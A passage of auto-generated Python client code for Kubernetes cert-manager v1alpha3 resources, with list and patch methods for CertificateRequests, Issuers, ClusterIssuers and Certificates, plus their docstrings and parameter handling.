async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_namespaced_certificate_request(self, namespace, **kwargs): # noqa: E501
"""list_namespaced_certificate_request # noqa: E501
list objects of kind CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_namespaced_certificate_request(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool allow_watch_bookmarks: allowWatchBookmarks requests watch events with type \"BOOKMARK\". Servers that do not implement bookmarks may ignore this flag and bookmarks are sent at the server's discretion. Clients should not assume bookmarks are returned at any specific interval, nor may they assume the server will send any BOOKMARK event during a session. If this is not a watch, this field is ignored. If the feature gate WatchBookmarks is not enabled in apiserver, this field is ignored.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3CertificateRequestList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_namespaced_certificate_request_with_http_info(namespace, **kwargs) # noqa: E501
def list_namespaced_certificate_request_with_http_info(self, namespace, **kwargs): # noqa: E501
"""list_namespaced_certificate_request # noqa: E501
list objects of kind CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_namespaced_certificate_request_with_http_info(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool allow_watch_bookmarks: allowWatchBookmarks requests watch events with type \"BOOKMARK\". Servers that do not implement bookmarks may ignore this flag and bookmarks are sent at the server's discretion. Clients should not assume bookmarks are returned at any specific interval, nor may they assume the server will send any BOOKMARK event during a session. If this is not a watch, this field is ignored. If the feature gate WatchBookmarks is not enabled in apiserver, this field is ignored.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3CertificateRequestList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'namespace',
'pretty',
'allow_watch_bookmarks',
'_continue',
'field_selector',
'label_selector',
'limit',
'resource_version',
'resource_version_match',
'timeout_seconds',
'watch'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_namespaced_certificate_request" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `list_namespaced_certificate_request`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'allow_watch_bookmarks' in local_var_params and local_var_params['allow_watch_bookmarks'] is not None: # noqa: E501
query_params.append(('allowWatchBookmarks', local_var_params['allow_watch_bookmarks'])) # noqa: E501
if '_continue' in local_var_params and local_var_params['_continue'] is not None: # noqa: E501
query_params.append(('continue', local_var_params['_continue'])) # noqa: E501
if 'field_selector' in local_var_params and local_var_params['field_selector'] is not None: # noqa: E501
query_params.append(('fieldSelector', local_var_params['field_selector'])) # noqa: E501
if 'label_selector' in local_var_params and local_var_params['label_selector'] is not None: # noqa: E501
query_params.append(('labelSelector', local_var_params['label_selector'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
if 'resource_version_match' in local_var_params and local_var_params['resource_version_match'] is not None: # noqa: E501
query_params.append(('resourceVersionMatch', local_var_params['resource_version_match'])) # noqa: E501
if 'timeout_seconds' in local_var_params and local_var_params['timeout_seconds'] is not None: # noqa: E501
query_params.append(('timeoutSeconds', local_var_params['timeout_seconds'])) # noqa: E501
if 'watch' in local_var_params and local_var_params['watch'] is not None: # noqa: E501
query_params.append(('watch', local_var_params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificaterequests', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3CertificateRequestList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_namespaced_issuer(self, namespace, **kwargs): # noqa: E501
"""list_namespaced_issuer # noqa: E501
list objects of kind Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_namespaced_issuer(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool allow_watch_bookmarks: allowWatchBookmarks requests watch events with type \"BOOKMARK\". Servers that do not implement bookmarks may ignore this flag and bookmarks are sent at the server's discretion. Clients should not assume bookmarks are returned at any specific interval, nor may they assume the server will send any BOOKMARK event during a session. If this is not a watch, this field is ignored. If the feature gate WatchBookmarks is not enabled in apiserver, this field is ignored.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3IssuerList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_namespaced_issuer_with_http_info(namespace, **kwargs) # noqa: E501
def list_namespaced_issuer_with_http_info(self, namespace, **kwargs): # noqa: E501
"""list_namespaced_issuer # noqa: E501
list objects of kind Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_namespaced_issuer_with_http_info(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool allow_watch_bookmarks: allowWatchBookmarks requests watch events with type \"BOOKMARK\". Servers that do not implement bookmarks may ignore this flag and bookmarks are sent at the server's discretion. Clients should not assume bookmarks are returned at any specific interval, nor may they assume the server will send any BOOKMARK event during a session. If this is not a watch, this field is ignored. If the feature gate WatchBookmarks is not enabled in apiserver, this field is ignored.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3IssuerList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'namespace',
'pretty',
'allow_watch_bookmarks',
'_continue',
'field_selector',
'label_selector',
'limit',
'resource_version',
'resource_version_match',
'timeout_seconds',
'watch'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_namespaced_issuer" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `list_namespaced_issuer`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'allow_watch_bookmarks' in local_var_params and local_var_params['allow_watch_bookmarks'] is not None: # noqa: E501
query_params.append(('allowWatchBookmarks', local_var_params['allow_watch_bookmarks'])) # noqa: E501
if '_continue' in local_var_params and local_var_params['_continue'] is not None: # noqa: E501
query_params.append(('continue', local_var_params['_continue'])) # noqa: E501
if 'field_selector' in local_var_params and local_var_params['field_selector'] is not None: # noqa: E501
query_params.append(('fieldSelector', local_var_params['field_selector'])) # noqa: E501
if 'label_selector' in local_var_params and local_var_params['label_selector'] is not None: # noqa: E501
query_params.append(('labelSelector', local_var_params['label_selector'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
if 'resource_version_match' in local_var_params and local_var_params['resource_version_match'] is not None: # noqa: E501
query_params.append(('resourceVersionMatch', local_var_params['resource_version_match'])) # noqa: E501
if 'timeout_seconds' in local_var_params and local_var_params['timeout_seconds'] is not None: # noqa: E501
query_params.append(('timeoutSeconds', local_var_params['timeout_seconds'])) # noqa: E501
if 'watch' in local_var_params and local_var_params['watch'] is not None: # noqa: E501
query_params.append(('watch', local_var_params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/issuers', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3IssuerList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_cluster_issuer(self, name, body, **kwargs): # noqa: E501
"""patch_cluster_issuer # noqa: E501
partially update the specified ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_cluster_issuer(name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the ClusterIssuer (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3ClusterIssuer
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_cluster_issuer_with_http_info(name, body, **kwargs) # noqa: E501
def patch_cluster_issuer_with_http_info(self, name, body, **kwargs): # noqa: E501
"""patch_cluster_issuer # noqa: E501
partially update the specified ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_cluster_issuer_with_http_info(name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the ClusterIssuer (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3ClusterIssuer, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_cluster_issuer" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `patch_cluster_issuer`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `patch_cluster_issuer`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/merge-patch+json', 'application/apply-patch+yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/clusterissuers/{name}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3ClusterIssuer', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_cluster_issuer_status(self, name, body, **kwargs): # noqa: E501
"""patch_cluster_issuer_status # noqa: E501
partially update status of the specified ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_cluster_issuer_status(name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the ClusterIssuer (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3ClusterIssuer
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_cluster_issuer_status_with_http_info(name, body, **kwargs) # noqa: E501
def patch_cluster_issuer_status_with_http_info(self, name, body, **kwargs): # noqa: E501
"""patch_cluster_issuer_status # noqa: E501
partially update status of the specified ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_cluster_issuer_status_with_http_info(name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the ClusterIssuer (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3ClusterIssuer, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_cluster_issuer_status" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `patch_cluster_issuer_status`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `patch_cluster_issuer_status`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/merge-patch+json', 'application/apply-patch+yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/clusterissuers/{name}/status', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3ClusterIssuer', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_namespaced_certificate(self, name, namespace, body, **kwargs): # noqa: E501
"""patch_namespaced_certificate # noqa: E501
partially update the specified Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_namespaced_certificate(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Certificate (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
